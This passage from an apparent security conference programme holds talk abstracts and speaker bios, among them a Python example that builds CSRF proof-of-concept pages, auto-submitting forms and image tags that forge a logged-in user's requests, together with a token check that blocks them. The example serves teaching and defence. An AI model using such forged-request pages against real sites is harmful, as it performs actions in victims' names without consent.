* Executing arbitrary actions on the web application using the attacked user's identity and authentication context
* Subverting the company's firewall and exploring the intranet
* Leaking sensitive information via hijacking JSON data
Furthermore, we will demonstrate how a simple CSRF exploit can be created semi-automatically in less than 5 minutes. The last quarter of the talk will be devoted to a brief overview of our client-side CSRF protection tools RequestRodeo [3] and LocalRodeo [4].
[1] OWASP Top 10: http://www.owasp.org/index.php/Top_10_2007
[2] Vulnerability Type Distributions in CVE: http://cwe.mitre.org/documents/vuln-trends/index.html
[3] RequestRodeo: http://www.nongnu.org/requestrodeo/
[4] LocalRodeo: http://databasement.net/labs/localrodeo/
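An added example of the semi-automatic exploit generation mentioned above, together with the server-side check that defeats the generated page (example code written for this page, not RequestRodeo, LocalRodeo or the talk's tool; the captured requests, host, paths and field names are constructed):

```python
import html
from urllib.parse import parse_qsl

# Constructed captures of the victim's own legitimate requests, as they would
# appear in a proxy log. Host, paths and field names are invented.
CAPTURED_POST = (
    "POST /account/transfer HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Cookie: SESSION=2f9c41\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 30\r\n"
    "\r\n"
    "to=DE12345678&amount=100&memo="
)
CAPTURED_GET = (
    "GET /account/logout?confirm=1 HTTP/1.1\r\n"
    "Host: bank.example\r\n"
    "Cookie: SESSION=2f9c41\r\n\r\n"
)


def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), path, headers, body


def csrf_poc(raw):
    """Turn a captured request into a page that re-issues it from the
    attacker's origin. The victim's browser attaches the session cookie by
    itself; that is the whole vulnerability."""
    method, path, headers, body = parse_request(raw)
    url = html.escape(f"http://{headers['host']}{path}", quote=True)
    if method == "GET":
        return f'<img src="{url}" alt="" width="1" height="1">'
    ctype = headers.get("content-type", "").split(";")[0].strip()
    if method != "POST" or ctype != "application/x-www-form-urlencoded":
        raise ValueError("a plain HTML form can only forge form-encoded POSTs")
    fields = "\n".join(
        f'  <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in parse_qsl(body, keep_blank_values=True))
    return (f'<form id="csrf" action="{url}" method="POST">\n{fields}\n</form>\n'
            '<script>document.getElementById("csrf").submit();</script>')


def server_accepts(headers, body, session_token, site="bank.example"):
    """The server-side check that defeats the generated page: the request
    must carry a secret bound to the session that a cross-site form cannot
    know. An Origin/Referer check is a useful second line, not a substitute,
    because both headers are frequently absent or stripped."""
    form = dict(parse_qsl(body, keep_blank_values=True))
    if form.get("csrf_token") != session_token:
        return False
    origin = headers.get("origin") or headers.get("referer", "")
    return origin.startswith(f"http://{site}") if origin else True


if __name__ == "__main__":
    print(csrf_poc(CAPTURED_GET))
    print(csrf_poc(CAPTURED_POST))
    _m, _p, hdrs, body = parse_request(CAPTURED_POST)
    print("forged request accepted:", server_accepts(hdrs, body, "t0k3n"))
```

The generator refuses anything a bare HTML form cannot reproduce (JSON or multipart bodies, custom headers), which is the line between "five minutes" and the harder cases the talk covers under JSON hijacking.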
Martin Johns studied Mathematics and Computer Science at the Universities of Göttingen (Germany), Santa Cruz (CA) and Hamburg (Germany), where he received his diploma in 2003. During the 1990s and the early years of the new millennium he earned his living as a software engineer at German companies (including Infoseek Germany, TC TrustCenter and SAP). In 2005 he joined the "security in distributed systems" group at the University of Hamburg to work on the project "Secologic", which is investigating the state of the art in software security.

The RFID Guardian

Melanie Rieback, Vrije Universiteit Amsterdam
This talk will present the design and implementation of the RFID Guardian, the first-ever unified platform for RFID security and privacy administration. Radio Frequency Identification (RFID) tags are remotely-powered data carriers that are often touted as "computers of the future" that bring intelligence to our homes and offices, optimize our supply chains, and keep a watchful eye on our pets, livestock, and kids. The RFID Guardian resembles an "RFID firewall", enabling individuals to monitor and control access to their RFID tags by combining a standard-issue RFID reader with unique RFID tag emulation capabilities. Our system provides a platform for coordinated usage of RFID security mechanisms, offering fine-grained control over RFID-based auditing, key management, access control, and authentication capabilities. We have prototyped the RFID Guardian using off-the-shelf components; compatible with the ISO 15693/14443 (13.56 MHz) RFID standards, it performs RFID tag emulation and selective RFID tag jamming.
Melanie Rieback is a final-year Ph.D. student in Computer Systems at the Vrije Universiteit in Amsterdam, where she is supervised by Prof. Andrew Tanenbaum. Melanie's research concerns the security and privacy of Radio Frequency Identification (RFID) technology, and she leads multidisciplinary research teams on RFID security (RFID Malware) and RFID privacy management (RFID Guardian) projects. Her research has attracted worldwide media attention, appearing in the New York Times, Washington Post, Reuters, UPI, Computerworld, CNN, BBC, MSNBC, and many other print, broadcast, and online news outlets. Melanie's research has received several awards (Best Paper: IEEE PerCom '06, Best Paper: USENIX Lisa '06, NWO I/O Prize, VU Mediakomeet, ISOC Award finalist), and Melanie has also served as an invited expert for RFID security discussions with both the American and Dutch governments. In a past life, Melanie also worked on the Human Genome Project at the Whitehead Institute / MIT Center for Genome Research.

Hijacking Virtual Machine Execution for Fun and Profit

Nguyen Anh Quynh, National Institute of Advanced Industrial Science and Technology, Japan
In general, virtual machine (VM) technology can guarantee strong isolation between VMs, so even if one VM is hacked, the other VMs are still not vulnerable. However, this talk demonstrates that if the attacker takes over the host VM, he can do pretty much anything he wants with the guest VMs. Several sophisticated techniques to hijack the execution of a running VM are presented, which can be used to redirect any VM's execution at will. While the proposed methods are not limited to any particular kind of virtual machine, we demonstrate them with the Xen Virtual Machine. In a demo, the attacker dynamically injects a few bytes (less than 10 bytes) into a running Linux VM, then captures (and later replays) all the keystrokes and screen output of the VM's consoles. The hijacking has no negative impact on I/O performance and is therefore unlikely to arouse any suspicion in the VM's owner. Meanwhile, the hijacking technique can also offer great benefits to white hats. The second demo proves that with only a few bytes injected into a protected VM, we can build a file-system integrity tool. Compared to traditional approaches like Tripwire, this IDS offers advantages such as real-time detection, zero deployment cost, richer intrusion evidence, and less exposure to the attacker. The presented techniques work with any kind of OS and need absolutely no modification to the kernel of the guest VMs or to the hypervisor. Moreover, everything is done in user space, so the approach is straightforward to implement and requires no deep knowledge of the OS kernel.
Nguyen Anh Quynh is a postdoctoral researcher at the National Institute of Advanced Industrial Science and Technology (AIST), Japan. His research interests include computer security, networking, data forensics, virtualization, Trusted Computing and operating systems. His papers have been published at various academic conferences, such as those of ACM, IEEE, LNCS and USENIX, among others. Quynh is a contributor to numerous open source projects (notably the Xen Virtual Machine and the Linux kernel). He loves to get involved with the industry, and he has given talks at hacking conferences such as EUSecWest, HackInTheBox and Hack.lu. Quynh obtained his PhD in computer science from Keio University, Japan. He is also a member of VNSecurity, a pioneering information security research group in Vietnam.


Ofir Arkin, Insightix
Network admission control (NAC), network access protection (NAP), network access control (NAC), and many other acronyms refer to technologies which aim to provide access control verification before (and after) allowing an element to access the network. Unfortunately, due to the lack of standardization and the diversity of solutions, many (if not most) NAC solutions suffer from a multitude of weaknesses impacting their deployment, their implementation and the overall protection they provide. The presentation examines various NAC solutions from leading vendors, highlights their weaknesses, and demonstrates how they can be bypassed. The presentation is an updated one, which includes new material and new unpublished methods to bypass NAC solutions.
Ofir Arkin is the CTO of Insightix (http://www.insightix.com), leading the development of the next generation of IT infrastructure discovery, monitoring and network access control systems for enterprise networks. He has more than 10 years of experience in data security research and management. He has consulted and worked for multinational companies in the financial, pharmaceutical and telecommunication sectors. Ofir is the author of a number of influential papers on information warfare, VoIP security, network discovery and network access control, and lectures regularly at security conferences. Ofir is chair of the security research committee of the Voice Over IP Security Alliance (VoIPSA). Ofir is the founder of Sys-Security Group (http://www.sys-security.com), a computer security research group.

The Business Case for removing your perimeter

Paul Simmonds, Global Information Security Director, ICI, Jericho Forum
The days of the corporate network, completely isolated behind a well-secured outer shell, are long gone; yet we continue to cling to this model. Global networks with no borders offer the potential of substantial savings in communications costs, maximum network agility and instant connectivity for clients and partners. Can you secure this incredibly compelling business model, and provide a long-term business case for security in which security contributes to the corporate bottom line and the CISO is seen as a true partner in corporate strategic thinking? What does business need from its suppliers to make this a feasible reality? What do you need to be doing now to achieve this goal?
Paul Simmonds joined ICI in 2001 when he was recruited to head up Information Security for ICI (www.ici.com), working for the CIO Office in London. Prior to joining ICI he spent a short time with a high-security European web hosting company as Head of Information Security, and before that seven years with Motorola, again in a global information security role. Paul is also a founding member of the Jericho Forum, a pan-global grouping of corporate companies working to define the issues and benefits of operating in a deperimeterised environment. In his career he has worked with many external agencies, including the FBI, Scotland Yard, Wiltshire Computer Crime and Wiltshire Child Protection. He has also been directly involved in two successful criminal prosecutions, giving evidence in one case. Paul has a degree in Electronic Engineering and a City & Guilds in Radio Communication and is also a qualified kayak coach. He came to the Information Security field from a background in IT systems implementation and consultancy, during which he wrote and implemented one of the UK's first web sites. He is married with three children and a very understanding wife, and in the little spare time that he has he teaches canoeing and runs charity radio stations.

The Many Dimensions of Security in eVoting

Peter Purgathofer, Vienna University of Technology
Various forms of eVoting are quickly becoming a hot item everywhere. While some societies bet on voting machines, others go directly for online voting. The talk discusses the wide array of security aspects that arise with this techno-social development.
Scientist at the Institute for Design and Assessment of Technology since 1991. Founder of the UID lab in Vienna. Current work in interaction design, game design, eLearning and aspects of informatics and society.

Doppelgänger - novel protection against unknown file format vulnerabilities

Rich Smith, Hewlett-Packard Labs, Trusted Systems Lab
The presentation intends to discuss the development of a general technique for protecting applications against unknown threats delivered through maliciously constructed data files. The technique is general in nature and could be applied in many ways. Two proof-of-concept applications will be discussed, one of which can be demonstrated. There has been a steady increase in attacks taking advantage of defects in client applications through malformed data files (WMF, ANI etc.). Such attacks rely on having specifically crafted data inside files associated with the affected applications, and are increasingly utilising unknown, unpatched vulnerabilities (0-day) in specifically targeted attacks against both industry and government. By definition, signature-based approaches that try to identify and stop such 0-day file format attacks are bound to fail. The Doppelgänger approach is a novel defence against this class of client-side attacks – its key difference being that it is able to defend against both known and unknown threats to client applications from malformed data files. Doppelgänger achieves this through random transformations of a file's data content, while maintaining informational and functional equivalence.
Rich Smith is a security researcher in the Trusted Systems Lab for Hewlett-Packard, based in Bristol, UK. His main research is in the area of threat futures, and he is interested in novel attack vectors, proactive defence techniques and protection against unknown threats. He develops new technologies for use both internally within HP and for enterprise and government customers. He has been working at HP Labs for 4 years, has a BSc in Computational Chemistry and an MSc with distinction in Information Security, and is currently undertaking a Contemporary Arts foundation course alongside his full-time security research.

Disruptive modernization of legacy systems

Shalom Carmel, --
The talk will demonstrate, using IBM System i as an example, the disruptive effect that modernization and the adoption of new technology may have on the security of legacy systems.
Currently, Shalom is employed in a large pharmaceutical company, where he is responsible for application integration, web technologies and e-business technologies. Before that he worked in a variety of jobs and roles in IT and MIS, including ERP implementations, security consulting, web applications development and others.

Web 2.0 Application Kung-Fu - Securing Ajax & Web Services

Shreeraj Shah, Net Square Solutions Pvt. Ltd.
With Web 2.0 applications being adopted by businesses at a very quick pace, security concerns around these technologies have grown too. Ajax and Web Services are key components of the Web 2.0 framework. Understanding the key components of the new technology vis-à-vis attack vectors is imperative if the security concerns are to be adequately addressed. Financial services companies such as Wells Fargo and E*Trade are adopting Web 2.0 technologies by building next-generation Enterprise 2.0 solutions. Ajax fingerprinting, crawling and scanning are key aspects of Web 2.0 threat profiling. It is possible to identify XSS and XSRF vulnerabilities and likely weak entry points on the basis of proper threat profiles. Ethical hackers must accomplish scanning and fuzzing before attackers have the chance to exploit vulnerable Web Services running on XML-RPC, SOAP and REST. This presentation is going to reveal methodologies, techniques and tricks to hack Web 2.0 applications, and defense strategies to secure them. The presentation includes a number of demonstrations and real-life cases encompassing next-generation attacks and defense. The speaker has already authored several tools – wsChess (Web Services hacking toolkit), Ajaxfinger, ScanAjax and MSNPawn – that will be demonstrated in detail.
Shreeraj Shah, B.E., MSCS, MBA, is the founder of Net Square, a company that provides security consulting, training and development services to the world's leading software vendors, financial and professional service providers. Prior to founding Net Square, he worked with Foundstone, Chase Manhattan Bank and IBM. He has performed several security consulting assignments in the areas of penetration testing, code reviews, web application assessments and security architecture reviews. He is also the author of Hacking Web Services (Thomson) and co-author of Web Hacking: Attacks and Defense (Addison-Wesley). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, etc. His articles are regularly published on SecurityFocus, InformIT, DevX, O'Reilly and HNS. His work has been quoted on BBC, Dark Reading and Bank Technology as an expert. You can read his blog at http://shreeraj.blogspot.com/

Web Hacking Training

Shreeraj Shah, Blueinfy
Web application security has been a growing concern. Web and application servers are the target of regular attacks by attackers that exploit security loopholes or vulnerabilities in code or design. Adding to this concern are next-generation applications: applications that are on the fast track and more appealing to the user, utilizing dynamic AJAX scripts, Web services and newer Web technologies to create intuitive and easy interfaces. The only constant in this space is change. In this dynamically changing scenario it is important to understand the new threats that emerge in order to build constructive strategies to protect corporate assets. This two-day workshop will expose students to both aspects of security: attacks and defense. To think of newer Web applications without Web services is a big mistake. Sooner or later existing applications will be forced to migrate to the new framework. This workshop includes several cases, demonstrations and hands-on exercises with newer tools to give you a head start over others in the field. The following topics will be covered in depth during these sessions:
* Web Security Fundamentals and Principles, Trends and Opportunities
* Methods, Components and Protocols (HTTP, HTTPS and SOAP)
* Web application assessment methods - Blackbox and Whitebox approaches
* Web application Deployment and Security Deployment issues
* Web application Footprinting, Discovery and Profiling
* Search engines and their role in Web Application hacking (Google & MSN)
* Web application attack vectors and assets-to-attacks mapping
* XML-based attacks
* SQL, LDAP, XPATH injection techniques
* XSS, Cross-site cookie spoiling and AJAX hacking
* Web services footprinting, discovery and profiling
* Web services attacks
* Web application firewall - Build and Deploy
* Web security controls and best practices
* Secure coding and reverse engineering methods
* Tools and Techniques
* Hands-on challenges and labs
Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy, a company that provides application security services. Prior to founding Blueinfy, he was founder and board member at Net Square. He also worked with Foundstone (McAfee), Chase Manhattan Bank and IBM in the security space. He has performed several security consulting assignments in the areas of penetration testing, code reviews, web application assessments and security architecture reviews. He is also the author of popular books like Hacking Web Services (Thomson, 2006) and Web Hacking: Attacks and Defense (Addison-Wesley, 2003). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, ISACA, etc. His articles are regularly published on SecurityFocus, InformIT, DevX, O'Reilly and HNS. His work has been quoted on BBC, Dark Reading and Bank Technology as an expert.

Are the vendors listening?

Simon Howard, DMZGlobal - www.dmzglobal.com
Are vendors listening to the security community? Security researchers have been presenting techniques to bypass commonly implemented technologies for years. White papers are published, ideas are presented and vulnerabilities disclosed. If your organisation is purchasing a new NAC solution from Vendor X, you want to know they have read “Bypassing Network Access Control (NAC) Systems” by Ofir Arkin and that their product has mitigation strategies in place for each attack vector. Even a paper published back in '98 like “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection” by Thomas Ptacek & Timothy Newsham still provides bypass techniques applicable in today's environment. Testing security products before you buy them is part of the due diligence process. Finding vulnerabilities gains you leverage with the sales rep: while he patches the bugs, you get a better product for less cash. During this talk I will take 3APA3A's white paper on “Bypassing content filtering software”, construct a series of tests and run them against the following SMTP filtering products:
* Trend Micro IMSS
* Mail Marshall SMTP
* Ironport
* Sophos PureMessage
* Proofpoint Messaging Security Gateway
* Symantec Mail Security for SMTP
At the conclusion of the presentation you can make up your own mind on whether the vendors are listening...
Simon Howard started programming BASIC on a ZX81 with a 16k RAM pack. Simon is currently employed by DMZGlobal, an MSSP in New Zealand tasked with building and managing secure environments for a variety of customers in the .govt, banking and energy sectors. Prior to working for DMZGlobal, Simon was a Linux-centric software engineer for a media company in Dunedin.

Observing the Tidal Waves of Malware

Stefano Zanero, Partner and CTO, Secure Network
In this talk we will address the main challenges to be solved in order to build an automatic, global network which can perform early warning, automatic classification and analysis of malware and exploits as they propagate, or are used, worldwide. We all know of honeypots, early warning systems, and the Internet Storm Center: what are the missing pieces before we can really observe the tidal waves of malware and exploit the knowledge gained?
Stefano Zanero received a Ph.D. degree in Computer Engineering from the Politecnico di Milano technical university, where he is currently a post-doc. His current research interests include the development of unsupervised-learning IDS and computer virology. He has been a speaker at international scientific and technical conferences, and he is the author and co-author of books and articles published in international, peer-reviewed journals and conferences. He is a member of the board of the "Journal in Computer Virology", and acts as a reviewer for "ACM Computing Reviews" and "IEEE Security & Privacy", as well as various primary international conferences. He is a member of the IEEE (Institute of Electrical and Electronics Engineers), for which he vice-chairs the Italian chapter of the Computer Society, of the ACM (Association for Computing Machinery), and a founding member and board member of the Italian Chapter of ISSA (Information Systems Security Association). He has also been a columnist for Computer World Italy, and received a journalism award in 2003. Since 2004 he has been a partner and CTO of Secure Network, a firm specializing in information security training and consulting, based in Milan.

Security -- an Obstacle for large-scale Projects and eGovernment?

Thomas Maus,
This talk tries to take up again a thread which was completely lost in the tumultuous public reception of a 21C3 talk: security is a fundamental quality dimension of information systems, a conditio sine qua non for the long-term acceptance both of any large-scale project and of information technology in general, an imperative prerequisite for critical infrastructures as well as for any legislative obligation of free citizens to use eGovernment. As eHealth projects concentrate and amplify all conceivable challenges of large-scale IT projects, they will serve as an excellent magnifying glass. Alas, experience shows they are a dangerous target of investigation: some believe them to be the panacea of modern health care. They are the object of fervent dispute, and seem to serve many (hidden?) agendas, at least as an opportunity to place some hype-tech and make much money. Starting with some (time-proven) worrying findings from German eHealth projects, we will follow their reception by the public, stakeholders, and government, as well as their further development. Widening our scope by and by, we try to find some generic patterns, and what we might learn from these messes:
* on a personal level as managers, technicians or security experts
* for large-scale projects in companies and governments
* as a society, structuring and controlling our dependency on information systems
Thomas Maus holds a graduate degree in computer science. He has been consulting in the areas of system security, the analysis, tuning, and prognosis of system performance, and the management of large, heterogeneous, mission-critical installations since 1993. Projects range from the architecture, implementation and operation of large application clusters, over technical project management, organisational and technical trouble-shooting, security assessments, the establishment of security governance processes, and security policies and analysis for trading rooms and the like, to the training of international police special forces for combating cyber-crime. He started his computing career in 1979, at the age of sixteen, when he won the computing equipment for his school in a state-wide competition. Soon followed the team-based development of comprehensive software for school administration on behalf of the federal state -- here a long-lasting affection for questions of system security, performance and architecture started. Around 1984 he fell in love with UNIX systems and IP stacks and embraced the idea of Free Software.

Economics of Information Security

Tyler Moore, University of Cambridge
The economics of information security has recently become a thriving and fast-moving discipline. As distributed systems are assembled from machines belonging to principals with divergent interests, we find that incentives are becoming as important as technical design in achieving dependability. The new field provides valuable insights not just into 'security' topics (such as bugs, spam, phishing, and law enforcement strategy) but into more general areas such as the design of peer-to-peer systems, the optimal balance of effort by programmers and testers, why privacy gets eroded, and the politics of digital rights management.
He joined the Cambridge Computer Laboratory's Security Group in 2004 as a PhD student investigating social and economic mechanisms as tools for strengthening network security. His research interests include security economics, decentralised network (e.g., peer-to-peer and sensor network) security, and complex network analysis. Prior to joining Cambridge, he studied at the University of Tulsa, identifying several vulnerabilities in the public telephone network's underlying signalling protocols and developing techniques for detecting attacks on the telecommunications infrastructure. Moore is a 2004 Marshall Scholar and 2004 US National Science Foundation Graduate Research Fellow.